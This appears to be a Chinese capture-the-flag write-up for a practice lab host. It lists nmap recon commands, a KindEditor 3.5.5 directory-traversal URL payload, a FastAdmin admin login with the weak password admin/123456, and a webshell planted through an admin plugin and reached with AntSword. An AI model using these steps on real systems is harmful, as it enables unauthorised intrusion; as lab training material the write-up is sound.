搜不到名字的靶场
靶场四-WP
收集资产
netdiscover -r 192.168.0.0/24
nmap -p- 192.168.0.135 #masscan -p 0-65535 192.168.0.135
nmap -sV -sC -p- -A 192.168.0.135
信息
端口 | 服务 |
---|---|
80/TCP | HTTP |
5985/TCP | wsman (http 403) |
7001/TCP | afs3-callback (http 403) |
wsman与afs3-callback均可想办法实现攻击
网站收集
在http://192.168.0.135/robots.txt
得到flag
flag{@OASQqwe128@}
发现http://192.168.0.135/0
是靶场登录页面
访问7001端口在examples找到kindeditor的样例版本为3.5.5,存在目录穿越漏洞
访问http://192.168.0.135:7001/php/file_manager_json.php?path=/
可以看到返回值
http://192.168.0.135:7001/php/file_manager_json.php?path=/.././.././.././.././.././
注意:每返回上一级都需要使用.././
访问192.168.0.135:7001/php/file_manager_json.php?path=/.././.././fastadmin/public/
可以看到一个flag.txt
获取flag2
flag{@hjykkx995Qa@}
发现WNeSOgakp.php为管理后台登陆地址,fastadmin管理后台存在弱口令admin/123456
在角色组找到flag3
flag{@hjlakDGDkjso@}
Getshell
由于后台插件安装了在线命令1.1.0
所以配置了一个一句话木马,然后通过蚁剑连接即可
进入虚拟终端在workstation的桌面找到flag4
flag{ed@sjhhjkqkgQQ}